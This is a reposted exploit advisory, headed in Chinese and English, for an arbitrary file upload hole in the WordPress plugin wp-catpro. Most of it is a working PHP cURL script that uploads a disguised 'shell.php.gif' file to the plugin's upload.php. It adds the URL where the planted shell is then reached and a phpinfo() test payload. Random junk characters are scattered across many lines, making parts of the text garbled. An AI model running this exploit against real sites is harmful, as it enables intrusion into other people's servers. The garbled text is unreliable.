WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
9 o( V0 V, b" j; O) J9 [8 U# y' m#-----------------------------------------------------------------------
; c; c% j3 L- k/ j# M
7 [8 n9 m+ \5 k; R! p作者  => Zikou-16
邮箱 => zikou16x@gmail.com
* T4 E+ Z0 U* G测试系统 : Windows 7 , Backtrack 5r3
3 G! r( E$ s+ y4 {9 T  ?  p下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
! x% e; J+ b2 m7 M% T$ I-----------
% ]- r0 ]. H& n$ }( {<?php

$uploadfile="zik.php.gif";
; E& c* o" Q9 |$ K7 `# y$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
; Q1 r. P, ?" w" Q& J5 [curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
! ?/ R5 Q. [7 S0 U! y' i$postResult = curl_exec($ch);
curl_close($ch);
* T4 V: r. p$ n: I6 |
print "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
<?php
phpinfo();
?>